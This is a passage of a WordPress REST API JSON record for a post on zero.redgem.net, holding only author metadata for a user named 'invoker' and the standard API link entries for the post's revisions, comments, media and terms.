redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32941","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=32941"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32941\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=32941"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=32941"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=32941"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}